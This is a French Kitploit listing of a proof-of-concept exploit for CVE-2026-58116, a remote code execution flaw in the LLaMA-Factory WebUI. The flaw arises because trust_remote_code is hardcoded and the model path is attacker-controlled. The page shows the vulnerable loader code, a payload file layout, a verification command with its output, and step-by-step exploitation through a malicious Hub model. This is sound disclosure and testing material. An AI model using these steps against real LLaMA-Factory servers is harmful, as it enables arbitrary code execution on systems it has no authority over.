Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — Preuve de concept d'exploitation pour CVE-2026-58116 démontrant l'exécution de code à distance dans LLaMA-Factory WebUI via l'injection de chemin de modèle trust_remote_code. Inclut un modèle de payload et un script de vérification pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebCTFArticles et RechercheApprentissage et ÉducationDéveloppement de Charges Utiles
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

Preuve de concept d'exploitation pour CVE-2026-58116 démontrant l'exécution de code à distance dans LLaMA-Factory WebUI via l'injection de chemin de modèle trust_remote_code. Inclut un modèle de payload et un script de vérification pour les tests de sécurité autorisés.

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-58116 — RCE de la WebUI LLaMA-Factory via trust_remote_code

Preuve de concept pour CVE-2026-58116 (CVSS 9.8 Critique) : exécution de code à distance dans LLaMA-Factory <= v0.9.5.

La WebUI de LLaMA-Factory encode en dur trust_remote_code=True lors du chargement d'un modèle (src/llamafactory/webui/chatter.py:139 et runner.py:175,320). Le champ « Model path », contrôlé par l'attaquant, est transmis sans validation à AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(), si bien que la bibliothèque transformers de Hugging Face télécharge et depuis un dépôt de modèle malveillant.

exécute du Python arbitraire

⚠️ Utilisation à des fins éducatives uniquement

Ce PoC est réservé aux tests de sécurité autorisés et à l'éducation. La charge utile incluse est volontairement inoffensive (elle affiche des informations de reconnaissance sur l'hôte via id). Exécutez-la uniquement contre des systèmes que vous possédez ou que vous êtes autorisé à tester. Ne déployez jamais une charge utile malveillante contre une infrastructure sans autorisation explicite.

Contenu

root@kitploit:~
.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

Comment fonctionne le sink

transformers instancie la classe de configuration avant de charger les poids, donc la charge utile dans PoCConfig.__init__ se déclenche dès que la configuration est lue — aucun poids ne doit exister. C'est exactement le chemin que LLaMA-Factory atteint via src/llamafactory/model/loader.py :

root@kitploit:~
def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

Démarrage rapide

Vérifiez le sink localement (aucune WebUI requise — prouve le contrat que la WebUI enfreint) :

root@kitploit:~
pip install transformers torch
python3 build_and_verify.py

Sortie attendue — remarquez que le bandeau de la charge utile apparaît pendant le chargement de la configuration :

root@kitploit:~
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

De bout en bout via une WebUI LLaMA-Factory en cours d'exécution :

  1. Téléversez le modèle PoC sur le Hub :
    root@kitploit:~
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. Lancez une interface LLaMA-Factory affectée : llamafactory-cli webui
  3. Ouvrez l'onglet Chat, définissez le Model path sur your-user/llmfcty-poc, puis cliquez sur Load Model.
  4. La charge utile s'exécute sur le serveur avec les droits du processus LLaMA-Factory.

Références

  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • Avis de VulnCheck : https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • Divulgation originale (h3nrrrych4u) : https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
Télécharger l’outil